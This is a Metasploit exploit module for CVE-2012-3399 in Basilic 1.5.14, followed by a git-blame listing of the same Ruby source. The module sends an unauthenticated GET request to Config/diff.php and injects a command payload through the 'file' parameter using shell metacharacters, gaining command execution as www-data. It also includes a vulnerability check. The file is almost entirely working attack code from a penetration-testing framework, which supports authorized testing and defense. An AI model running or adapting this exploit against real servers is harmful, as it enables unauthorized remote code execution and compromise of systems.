modules/exploits/unix/webapp/basilic_diff_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',
        'Description' => %q{
          This module abuses a metacharacter injection vulnerability in the
          diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary
          commands as the www-data user account.
        },
        'Author' => [
          'lcashdollar',
          'sinn3r',
          'juan vazquez'
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2012-3399' ],
          [ 'OSVDB', '83719' ],
          [ 'BID', '54234' ]
        ],
        'Platform' => %w{linux unix},
        'Arch' => ARCH_CMD,
        'Privileged' => true,
        'Payload' => {
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic perl ruby python telnet'
                        }
        },
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-06-28',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])
      ]
    )
  end

  def check
    base = normalize_uri(target_uri.path)

    sig = rand_text_alpha(10)

    res = send_request_cgi({
      'uri' => normalize_uri("/#{base}/Config/diff.php"),
      'vars_get' => {
        'file' => sig,
        'new' => '1',
        'old' => '2'
      }
    })

    if res and res.code == 200 and res.body =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Sending GET request...")

    base = normalize_uri(target_uri.path)

    res = send_request_cgi({
      'uri' => normalize_uri("/#{base}/Config/diff.php"),
      'vars_get' => {
        'file' => "&#{payload.encoded} #",
        'new' => '1',
        'old' => '2'
      }
    })

    if res and res.code == 404 then
      print_error("404 Basilic not installed or possibly check URI Path.")
    else
      vprint_line("Server returned #{res.code}")
    end

    handler
  end
end
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`include Msf::Exploit::Remote::HttpClient`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',`
			`'Description' => %q{`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`This module abuses a metacharacter injection vulnerability in the`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary`
			`commands as the www-data user account.`
			`},`
			`'Author' => [`
We worked on it, so we got credit 2012-07-06 02:12:10 -05:00			`'lcashdollar',`
			`'sinn3r',`
juan author name updated 2012-08-06 18:59:16 +02:00			`'juan vazquez'`
We worked on it, so we got credit 2012-07-06 02:12:10 -05:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'License' => MSF_LICENSE,`
			`'References' => [`
Update CVE references for exploit modules 2018-07-08 18:46:04 -05:00			`[ 'CVE', '2012-3399' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '83719' ],`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`[ 'BID', '54234' ]`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => %w{linux unix},`
			`'Arch' => ARCH_CMD,`
			`'Privileged' => true,`
			`'Payload' => {`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`'DisableNops' => true,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic perl ruby python telnet'`
			`}`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Targets' => [`
			`[ 'Automatic Target', {}]`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultTarget' => 0,`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DisclosureDate' => '2012-06-28',`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`]`
			`)`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`def check`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`base = normalize_uri(target_uri.path)`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`sig = rand_text_alpha(10)`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`res = send_request_cgi({`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => normalize_uri("/#{base}/Config/diff.php"),`
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`'vars_get' => {`
			`'file' => sig,`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'new' => '1',`
			`'old' => '2'`
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`}`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Check 200 2013-08-16 11:34:32 -05:00			`if res and res.code == 200 and res.body =~ /#{sig}/`
			`return Exploit::CheckCode::Vulnerable`
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Check 200 2013-08-16 11:34:32 -05:00			`return Exploit::CheckCode::Safe`
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`def exploit`
			`print_status("Sending GET request...")`
Retab modules 2013-08-30 16:28:54 -05:00
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`base = normalize_uri(target_uri.path)`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`res = send_request_cgi({`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'uri' => normalize_uri("/#{base}/Config/diff.php"),`
			`'vars_get' => {`
			`'file' => "&#{payload.encoded} #",`
			`'new' => '1',`
			`'old' => '2'`
			`}`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`if res and res.code == 404 then`
			`print_error("404 Basilic not installed or possibly check URI Path.")`
			`else`
Be less verbose 2012-07-15 22:19:12 -05:00			`vprint_line("Server returned #{res.code}")`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`handler`
			`end`
			`end`